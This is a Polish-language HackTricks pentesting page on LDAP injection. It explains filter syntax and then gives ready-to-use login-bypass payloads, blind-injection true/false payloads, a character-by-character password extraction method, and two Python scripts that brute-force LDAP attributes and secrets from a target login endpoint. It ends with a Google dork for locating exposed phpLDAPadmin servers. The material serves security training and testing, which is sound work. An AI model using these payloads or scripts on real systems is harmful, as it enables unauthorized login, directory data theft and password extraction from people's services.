Polish - Ht
HackTricks Training Twitter Linkedin Sponsor

LDAP Injection

LDAP Injection

Wsparcie HackTricks

Jeśli jesteś zainteresowany karierą w hacking i chcesz złamać to, co nie do złamania - zatrudniamy! (wymagana biegła znajomość polskiego w mowie i piśmie).

LDAP Injection

LDAP

Jeśli chcesz wiedzieć, czym jest LDAP, odwiedź następującą stronę:

389, 636, 3268, 3269 - Pentesting LDAP

LDAP Injection to atak skierowany na aplikacje webowe, które konstruują instrukcje LDAP na podstawie danych wejściowych od użytkownika. Występuje, gdy aplikacja nieprawidłowo oczyszcza dane wejściowe, co pozwala atakującym na manipulację instrukcjami LDAP przez lokalny proxy, co może prowadzić do nieautoryzowanego dostępu lub manipulacji danymi.

Filtr = ( filtercomp ) Filtercomp = and / or / not / item And = & filterlist Or = |filterlist Not = ! filter Filterlist = 1*filter Item= simple / present / substring Simple = attr filtertype assertionvalue Filtertype = '=' / '~=' / '>=' / '<=' Present = attr = * Substring = attr ”=” [initial] * [final] Initial = assertionvalue Final = assertionvalue (&) = Absolutna PRAWDA (|) = Absolutna FAŁSZ

Na przykład: (&(!(objectClass=Impresoras))(uid=s*)) (&(objectClass=user)(uid=*))

Możesz uzyskać dostęp do bazy danych, która może zawierać informacje różnych typów.

OpenLDAP: Jeśli przyjdą 2 filtry, wykonuje tylko pierwszy. ADAM lub Microsoft LDS: Przy 2 filtrach zgłaszają błąd. SunOne Directory Server 5.0: Wykonuje oba filtry.

Bardzo ważne jest, aby wysłać filtr z poprawną składnią, w przeciwnym razie zostanie zgłoszony błąd. Lepiej wysłać tylko 1 filtr.

Filtr musi zaczynać się od: & lub | Przykład: (&(directory=val1)(folder=public))

(&(objectClass=VALUE1)(type=Epson*)) VALUE1 = *)(ObjectClass=*))(&(objectClass=void

Następnie: (&(objectClass=*)(ObjectClass=*)) będzie pierwszym filtrem (tym, który zostanie wykonany).

Bypass logowania

LDAP obsługuje kilka formatów przechowywania hasła: clear, md5, smd5, sh1, sha, crypt. Może się zdarzyć, że niezależnie od tego, co wprowadzisz w haśle, zostanie ono zhashowane.

user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))

Listy

Ślepa Iniekcja LDAP

Możesz wymusić odpowiedzi False lub True, aby sprawdzić, czy jakiekolwiek dane są zwracane i potwierdzić możliwą Ślepą Iniekcję LDAP:

#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))

Dump data

Możesz iterować po literach ASCII, cyfrach i symbolach:

(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...

Skrypty

Odkryj ważne pola LDAP

Obiekty LDAP domyślnie zawierają kilka atrybutów, które mogą być używane do zapisywania informacji. Możesz spróbować brute-force'ować wszystkie z nich, aby wyodrębnić te informacje. Możesz znaleźć listę domyślnych atrybutów LDAP tutaj.

#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes: #Extract all attributes
value = ""
finish = False
while not finish:
for char in alphabet: #In each possition test each possible printable char
query = f"*)({attribute}={value}{char}*"
data = {'login':query, 'password':'bla'}
r = requests.post(url, data=data, proxies=proxy)
sys.stdout.write(f"\r{attribute}: {value}{char}")
#sleep(0.5) #Avoid brute-force bans
if "Cannot login" in r.text:
value += str(char)
break

if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()

Specjalna Ślepa Iniekcja LDAP (bez "*")

#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break

Google Dorks

intitle:"phpLDAPadmin" inurl:cmd.php

Więcej Payloadów

Jeśli jesteś zainteresowany karierą w hackingu i chcesz zhakować to, co nie do zhakowania - zatrudniamy! (wymagana biegła znajomość polskiego w mowie i piśmie).

Wsparcie HackTricks
PreviousJWT Vulnerabilities (Json Web Tokens)NextLogin Bypass

Last updated